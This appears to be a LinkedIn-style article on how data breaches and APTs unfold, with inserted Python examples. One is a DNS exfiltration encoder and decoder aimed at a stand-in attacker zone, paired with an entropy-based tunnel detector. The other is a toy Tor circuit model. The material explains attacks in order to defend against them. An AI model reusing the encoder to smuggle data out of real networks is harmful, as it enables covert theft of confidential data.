Do you want to stop data breaches? Let's first get a deeper understanding of how a data breach happens.
Businesses handle vast amounts of sensitive personal, financial and business data, some of it governed by laws and regulations in local and international jurisdictions. Organizations need to secure their digital infrastructure to comply with those laws, to reduce the financial losses that result from data breaches, and to provide a secure digital environment for customers and partners, which in turn supports competitiveness in the marketplace.
The financial consequences of a data breach are on the rise, and the cost goes well beyond potential fines: a breach can damage a company's reputation and stock price as well as its bottom line. This amplifies the relentless challenge of staying ahead of security vulnerabilities and preventing sensitive data from leaving the organisation's secure perimeter.
Reports show that external attackers are the primary cause of data breaches; yet the defence mechanisms organizations deploy (such as DLP) focus mainly on insiders and enterprise users, to detect internal or accidental leaks. External data breaches are usually the result of Advanced Persistent Threats (APTs) that unfold over a long period (many months), during which the attackers remain hidden while they gain access to enterprise systems, compromise infrastructure and steal data.
How a data breach could happen
To defend against data breaches, the first step is to understand how they take place. The stage of a breach in which the data actually leaves, technically called data exfiltration, is the transmission of confidential data outside the enterprise network boundary. It is commonly achieved after attackers establish a foothold in the organization's internal network and use sophisticated techniques to remain hidden for long periods while actively hunting for valuable data. Attackers can use multiple pathways to steal data, but the ones most often left open unknowingly are botnets and APTs. APTs are aggressive attacks in which the attackers stay anonymous and hidden, allowing them to gain access to enterprise systems, compromise infrastructure and steal data.
APT attacks are usually highly targeted, with clear goals; the targets are typically governments or enterprises possessing intellectual property or digital assets of substantial value that bring competitive advantage or strategic benefit. The actors behind APTs are typically a group of skilled attackers working in a coordinated way. They may belong to a government or military cyber unit, or be hired as cyber mercenaries by governments and enterprises. This gives them the ability to work over a long period and to obtain zero-day vulnerabilities and attack tools. When state-sponsored, they may even operate with the support of military or state intelligence (Chen et al., 2014b).
APT attacks are stealthy: they stay undetected, conceal themselves within normal enterprise network traffic, and interact only as much as needed to achieve their objectives. The attackers locate their target data using various collection and monitoring tools. Once it is found, they gather as much data as possible from the enterprise network and exfiltrate it slowly to avoid detection. To transmit the data, they typically use backdoors, or exploit a vulnerability in the operating system, to establish a channel between the compromised host and their own servers over a predetermined protocol such as DNS or HTTPS. DNS, for example, can be misused to carry command and control with a compromised host, to move malicious code into a network, and to exfiltrate data encoded in query names, since outbound DNS is almost always allowed. HTTPS is equally attractive because its flexible structure lets attackers blend command-and-control and large data transfers into ordinary encrypted web traffic, which minimizes the risk of detection: unless TLS inspection is in place, the defender sees only the destination and the volume, not the content.
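The DNS channel described above, as an added example that is not code from the original article: a toy exfiltration encoder (the attacker side, splitting a file into base32 query labels under a zone the attacker controls) beside a detector that flags such a zone in a resolver log by counting distinct subdomains and measuring their length and entropy. The zone name, the "stolen" bytes and the benign log entries are all constructed for the example.

```python
"""
Added example (not from the original article): a toy DNS exfiltration
encoder beside a detector that flags the resulting query names in a DNS
log. Zone, file contents and log lines are constructed; the zone name is
hypothetical.
"""
import base64
import math
import random
from collections import defaultdict

ATTACKER_ZONE = "upd.example-cdn.net"   # hypothetical attacker-controlled zone
CHUNK_BYTES = 30                        # 30 bytes -> 48 base32 chars, under the 63-char label limit

# Constructed "stolen file": 600 pseudo-random bytes from a fixed seed.
STOLEN = random.Random(1234).randbytes(600)

# Constructed benign background queries as seen in a resolver log.
BENIGN_QUERIES = [
    "www.example.com", "mail.example.com", "cdn1.example.com", "api.example.com",
    "login.microsoftonline.com", "www.google.com", "ocsp.digicert.com", "time.windows.com",
]


def encode_for_dns(data: bytes, zone: str = ATTACKER_ZONE) -> list[str]:
    """Attacker side: chunk the data, base32-encode each chunk (DNS names are
    case-insensitive, so base64 would be mangled by resolvers) and prefix a
    sequence number so the receiving server can reorder retried queries."""
    names = []
    for seq, off in enumerate(range(0, len(data), CHUNK_BYTES)):
        chunk = data[off:off + CHUNK_BYTES]
        label = base64.b32encode(chunk).decode().rstrip("=").lower()
        names.append(f"{seq}.{label}.{zone}")
    return names


def decode_from_dns(names: list[str], zone: str = ATTACKER_ZONE) -> bytes:
    """Attacker's authoritative server: strip the zone, restore base32
    padding, decode, and reassemble in sequence order."""
    chunks = {}
    for name in names:
        seq, label = name[: -(len(zone) + 1)].split(".", 1)
        padded = label.upper() + "=" * (-len(label) % 8)
        chunks[int(seq)] = base64.b32decode(padded)
    return b"".join(chunks[i] for i in sorted(chunks))


def shannon_entropy(s: str) -> float:
    """Bits per character: 0.0 for 'www', roughly 4.5 for 48 random base32 chars."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_tunnel_zones(qnames, min_queries=10, min_prefix_len=30, min_entropy=3.5):
    """Detector: group queries by the last two labels (a real deployment should
    use the Public Suffix List rather than this naive split) and flag a zone
    whose distinct subdomains are numerous, long and high-entropy. Each test
    alone misfires on CDNs or tracking pixels; the combination is what counts."""
    by_zone = defaultdict(set)
    for q in qnames:
        labels = q.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue                      # bare apex: nothing to tunnel in
        by_zone[".".join(labels[-2:])].add("".join(labels[:-2]))
    flagged = {}
    for zone, prefixes in by_zone.items():
        if len(prefixes) < min_queries:
            continue
        mean_len = sum(len(p) for p in prefixes) / len(prefixes)
        mean_ent = sum(shannon_entropy(p) for p in prefixes) / len(prefixes)
        if mean_len >= min_prefix_len and mean_ent >= min_entropy:
            flagged[zone] = {"queries": len(prefixes),
                             "mean_prefix_len": round(mean_len, 1),
                             "mean_entropy": round(mean_ent, 2)}
    return flagged


def demo() -> dict:
    """Run the attacker encoder, check it round-trips, then run the detector
    over the mixed benign-plus-tunnel log."""
    tunnel = encode_for_dns(STOLEN)
    assert decode_from_dns(tunnel) == STOLEN
    return find_tunnel_zones(BENIGN_QUERIES + tunnel)


if __name__ == "__main__":
    for zone, stats in demo().items():
        print(f"possible DNS tunnel to {zone}: {stats}")
```

The thresholds are deliberately combined: a large CDN also produces many distinct subdomains, and a single long label is not suspicious on its own, but twenty long, near-random labels under one otherwise unknown zone is the signature of a tunnel. A slow, patient attacker can stay under the query-count threshold per day, which is why the text stresses analysis over long windows.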
The final step is to exfiltrate the stolen data to remote servers in encrypted traffic through anonymity networks (e.g. Tor and I2P). Anonymity networks consist of relay servers run by volunteers all over the world. When an attacker connects to the Tor network, a circuit is built from the client to the destination server through three relays (a guard, a middle and an exit), and all communication is relayed along this pre-built path. The data is wrapped in layers of encryption, one per relay, so that each relay learns only the previous and the next hop: the guard knows the sender but not the destination, and the exit knows the destination but not the sender (Winter et al., 2014). This makes it very hard to trace the traffic back to its source, although the exit relay does see the traffic in whatever form the application sent it, which is why the exfiltrated data is encrypted end-to-end as well.
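The three-relay circuit above, modelled as an added example that is not code from the original article or from the Tor project: the client wraps a cell in one layer per relay, each relay peels only its own layer, and the model records what each hop can observe. The cipher is a toy keystream used only to keep the example dependency-free (Tor uses AES per hop inside TLS); the relay names, keys, client address and destination are constructed.

```python
"""
Added example (not from the original article): a minimal model of the
three-relay Tor-style circuit described above, showing what each relay can
and cannot see. The cipher is a toy keystream (SHA-256 in counter mode,
XORed) used only to keep the example dependency-free; real Tor uses AES
per hop inside TLS. Relay names, keys, client address and destination are
all constructed.
"""
import hashlib
import json

# Constructed circuit: (relay name, session key the client shares with that relay).
CIRCUIT = [("guard", b"k-guard"), ("middle", b"k-middle"), ("exit", b"k-exit")]


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher: XOR with SHA-256(key || block counter). Being XOR,
    the same call encrypts and decrypts. Not for real use."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hashlib.sha256(key + off.to_bytes(4, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[off:off + 32], block))
    return bytes(out)


def build_onion(destination: str, payload: bytes, circuit=CIRCUIT) -> bytes:
    """Client side: wrap the message innermost-first, so each relay peels
    exactly one layer and learns only where to forward the rest."""
    cell = json.dumps({"next": destination, "data": payload.hex()}).encode()
    cell = keystream_xor(circuit[-1][1], cell)                 # exit's layer
    for i in range(len(circuit) - 2, -1, -1):                  # middle, then guard
        layer = json.dumps({"next": circuit[i + 1][0], "data": cell.hex()}).encode()
        cell = keystream_xor(circuit[i][1], layer)
    return cell


def relay_peel(key: bytes, cell: bytes) -> tuple:
    """One relay's work: strip its own layer, read the next hop, forward the
    rest. With the wrong key the result is noise and json.loads fails."""
    view = json.loads(keystream_xor(key, cell))
    return view["next"], bytes.fromhex(view["data"])


def can_read(key: bytes, cell: bytes) -> bool:
    """Whether a holder of `key` can open the outer layer of this cell."""
    try:
        relay_peel(key, cell)
        return True
    except ValueError:          # covers UnicodeDecodeError and JSONDecodeError
        return False


def walk_circuit(cell: bytes, circuit=CIRCUIT, sender: str = "client 203.0.113.7"):
    """Push the cell through every relay and record what each one observes."""
    observations, came_from = [], sender
    for name, key in circuit:
        next_hop, cell = relay_peel(key, cell)
        observations.append({"relay": name, "from": came_from, "to": next_hop})
        came_from = name
    return observations, cell   # `cell` is now what the exit sends on to the destination


if __name__ == "__main__":
    onion = build_onion("bank.example.net:443", b"GET /export HTTP/1.1")
    seen, plaintext = walk_circuit(onion)
    for hop in seen:
        print(hop)
    print("exit forwards:", plaintext)
```

The last line of output is the point of the caveat in the text: the exit relay forwards, and can read, exactly what the client put inside the innermost layer, so anything the attacker does not encrypt end-to-end is exposed at the exit even though the sender remains hidden from it.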
Moreover, with an APT the data leakage might not occur until several months after the target system was first compromised. The time attackers take to exfiltrate data depends on many factors, such as the attack strategy, the data size, the link speed and the detection defences installed at the target network. For example, the Carbanak APT was a massive money-stealing campaign with total losses estimated at up to US$1 billion; the campaign has been active since December 2013, with peak infections and compromised banking systems recorded in June 2014. Attackers may also use other attacks, such as distributed denial of service (DDoS), as a distraction from the real thrust of data exfiltration. For example, attackers used DDoS against the Carphone Warehouse websites to distract its IT team from a coordinated breach of the customer database that resulted in the theft of 2.4 million customer records.
Detecting APTs is very challenging: it requires deep analysis of system events spread over a long period (many months) and across a distributed environment, originating from different networks, systems and applications. In other words, preventing data breaches requires greater visibility into all layers of the digital infrastructure, into digital asset activity and into the threat landscape. Since APT actors use stealthy and evasive state-of-the-art techniques, there is no single known pattern that traditional signature-based solutions can recognise, and the volume of data that must be analysed makes manual correlation impractical.
Solution
To prevent data breaches, and to stop APTs at the initial stages before data exfiltration can take place, organisations need to implement robust defence-in-depth controls at all levels, including hardware, networks, operating systems and applications, and especially at the network level. Inspecting traffic headers alone is no longer sufficient; security teams need policies and rules that examine the full content of packets as they traverse a monitored network checkpoint (for encrypted traffic such as HTTPS this means either TLS inspection or analysis of the metadata that remains visible, such as destination, timing and volume). There are sensitivity and trade-off points between security and performance that affect both the performance and the architectural decisions of cybersecurity controls, and this brings us to another important concept, "risk appetite", which defines an organization's risk tolerance.
With the complexity of today's businesses and their digital infrastructure, enterprises also need to understand why and how a breach happened, with logical reasoning, to enable effective security operations and risk management plans and to automate security operations. Human analysts alone can no longer reason quickly and thoroughly enough to make decisions in such complex environments, and security teams need a new way of working to become more agile and autonomous.
Intelligence-driven solutions, such as threat intelligence and data science, have recently been introduced to streamline incident response and reduce the risk of such APT threats and data breaches. A key enabler of threat intelligence is data intelligence, or in other words cyber data management. Data intelligence gives organizations a better understanding of their business and threat data, so that risk management and incident response can be automated and sped up and effective, measurable security controls developed. Data and threat intelligence can be supported by Artificial Intelligence (AI) and Machine Learning (ML), which add predictive power by automating and enhancing regression, analysis, classification and prediction. However, ML and AI will never be a silver bullet that stops attackers, unlike fields such as image recognition or natural language processing where machine learning is prospering: in security the adversary adapts to whatever model is deployed against them. Using AI/ML to implement intelligence-driven security has several requirements and challenges (I will try to discuss these in another article).
In conclusion, achieving a strong cyber security posture on a limited budget is a complex problem with interrelated components at both the business and technology levels. As a business leader you may find it challenging to deal with the above complexities and to ensure better transparency, visibility and interpretation of cyber data and decisions, in order to improve productivity, efficiency and effectiveness across your organization's security posture. What you need, however, is to recognise the complexity of the problem and to talk to the right teams who can help you uplift the cybersecurity of your organization.
Kind Regards,
Dr. Amani S. Ibrahim
Cyber Security Leader, MBA (Cyber)
2y: Great write-up! Really appreciate you sharing your thoughts here for everyone to learn!